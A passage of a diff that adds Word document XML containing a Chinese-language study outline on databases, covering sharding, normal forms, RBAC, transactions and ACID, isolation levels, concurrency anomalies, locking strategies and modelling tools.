+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>数据库分库、拆表、分布式、集群、备份、故障调控等方案</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="25"/>
+        </w:numPr>
+        <w:ind w:left="450"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>数据库三大范式与反范式</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="25"/>
+        </w:numPr>
+        <w:ind w:left="450"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>RBAC</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>（</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Role-Based Access Control</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>，基于角色的访问控制）权限模型</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="25"/>
+        </w:numPr>
+        <w:ind w:left="450"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>数据库机制</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="26"/>
+        </w:numPr>
+        <w:ind w:left="900"/>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:b/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>索引</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="26"/>
+        </w:numPr>
+        <w:ind w:left="900"/>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:b/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>存储引擎</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="26"/>
+        </w:numPr>
+        <w:ind w:left="900"/>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:b/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>事务</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="27"/>
+        </w:numPr>
+        <w:ind w:left="1350"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>四大特性</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>(ACID)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="27"/>
+        </w:numPr>
+        <w:ind w:left="1800"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>原子性</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Atomicity</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="27"/>
+        </w:numPr>
+        <w:ind w:left="1800"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>一致性</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Consistency</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="27"/>
+        </w:numPr>
+        <w:ind w:left="1800"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>隔离性</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Isolation</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="27"/>
+        </w:numPr>
+        <w:ind w:left="1800"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>持续性</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Durability</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="27"/>
+        </w:numPr>
+        <w:ind w:left="1350"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>并发产生的问题</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+        <w:ind w:left="1800"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>脏读</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+        <w:ind w:left="1800"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>幻读</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+        <w:ind w:left="1800"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>不可重复读</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+        <w:ind w:left="1800"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>...</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="27"/>
+        </w:numPr>
+        <w:ind w:left="1350"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>解决方案</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>—</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>隔离级别</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="29"/>
+        </w:numPr>
+        <w:ind w:left="1800"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>读未提交</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Read uncommitted</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="29"/>
+        </w:numPr>
+        <w:ind w:left="1800"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>读已提交</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Read committed (mssql</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>、</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>oracle)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="29"/>
+        </w:numPr>
+        <w:ind w:left="1800"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>可重复读</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Repeatable read</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>（</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>mysql</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>）</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="29"/>
+        </w:numPr>
+        <w:ind w:left="1800"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>串行化</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Serializable</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="26"/>
+        </w:numPr>
+        <w:ind w:left="900"/>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:b/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>锁机制</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+        <w:ind w:left="1350"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>种类、粒度、加锁方式</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+        <w:ind w:left="1350"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>悲观锁</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>开销大，避免长事务</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="30"/>
+        </w:numPr>
+        <w:ind w:left="1800"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>表锁、行锁</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>读锁、写锁</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+        <w:ind w:left="1350"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>乐观锁</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>开销小，读大于写</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="31"/>
+        </w:numPr>
+        <w:ind w:left="1800"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Version</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>版本号机制</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+        <w:ind w:left="1350"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>...</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="25"/>
+        </w:numPr>
+        <w:ind w:left="450"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>数据库辅助工具：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Power Designer</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>、</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>EZDML</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>、</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>ER Studio</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>、</w:t>
+      </w:r>
+      <w:r>
